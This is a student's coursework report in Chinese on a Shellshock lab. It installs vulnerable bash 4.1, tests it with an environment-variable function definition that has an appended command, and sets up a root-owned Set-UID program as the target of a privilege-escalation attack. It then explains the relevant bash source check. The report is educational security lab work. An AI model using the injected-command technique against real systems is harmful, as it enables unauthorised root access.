20199319《Linux内核原理与分析》第十一周作业

ShellShock攻击实验

什么是ShellShock

Shellshock，又称Bashdoor，是在Unix中广泛使用的Bash shell中的一个安全漏洞，首次于2014年9月24日公开。许多互联网守护进程，如网页服务器，使用bash来处理某些命令，从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。——摘自维基百科

实验准备

环境搭建

以root权限安装4.1版bash（4.2版本以上的漏洞已经被堵上了）

wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz

安装bash 4.1

tar xf bash-4.1.tar.gz
cd bash-4.1
./configure
make & make install

链接

rm /bin/bash
ln -s /usr/local/bin/bash /bin/bash

到这里就安装完了，接下来输入以下命令检测是否存在shellshock漏洞,结果输出vulnerable，说明漏洞存在。

exit
env x='() { :;}; echo vulnerable' bash -c "echo this is a test "

最后，让/bin/sh 指向/bin/bash.

sudo ln -sf /bin/bash /bin/sh

预备知识

了解bash自定义函数，只需要函数名就能够调用该函数。

foo() { echo bar; }
foo

这个时候的Bash的环境变量：

KEY = foo

VALUE = () { echo bar; }

再执行命令

export foo=’() { :; }; echo Hello 20199319’
bash

此时，

KEY = foo

VALUE = () { :; }; echo Hello 20199319

bash读取了环境变量，在定义foo之后直接调用了后面的函数。 一旦调用bash，自定义的语句就直接触发。

实验内容

攻击Set-UID程序

1、本实验中通过攻击Set-UID程序来获得root权限。首先，确保安装了带有漏洞的bash版本，并让/bin/sh 指向/bin/bash。然后新建shock.c文件

#include <stdio.h>
void main()
{
    setuid(geteuid()); // make real uid = effective uid.
    system("/bin/ls -l");
}

2、编译这段代码，并设置其为Set-UID程序，保证它的所有者是root。

sudo su
gcc -o shock shock.c
chmod u+s shock

3、这里使用了setuid(geteuid()) 来使real uid = effective uid，这在Set-UID程序中不是普遍实践，但它确实有时会发生。 先自己试着hack一下

4、更改shock.c,去掉setuid(geteuid()) 语句，再次攻击。

发现攻击失败，说明如果 real uid 和 effective uid 相同的话，定义在环境变量中的内容在该程序内有效，那样shellshock漏洞就能够被利用了。但是如果两个uid不同的话，环境变量失效，就无法发动攻击了，这可以从bash的源代码中得到印证（variables.c,在308到369行之间）

5、variables.c简化后的关键部分

代码中判断逻辑导致了两者的不同，primode即私有模式，要求real uid 与 effective uid保持一致。

void initialize_shell_variables(){
// 循环遍历所有环境变量
for (string_index = 0; string = env[string_index++]; ) {
     /*...*/
     /* 如果有export过的函数, 在这里定义 */
     /* 无法导入在特权模式下（root下）定义的函数 */
     if (privmode == 0 && read_but_dont_execute == 0 &&
           STREQN (“() {“, string, 4)) {
           [...]
           // 这里是shellshock发生的地方
           // 传递函数定义 + 运行额外的指令
           parse_and_execute (temp_string, name,
                SEVAL_NONINT|SEVAL_NOHIST);
[...]
} }

总结

通过之前的学习，对Linux有了一定的动手能力，对实验楼以及linux系统的使用也越来越熟练，实验中输错命令出现了问题，改正后也解决了。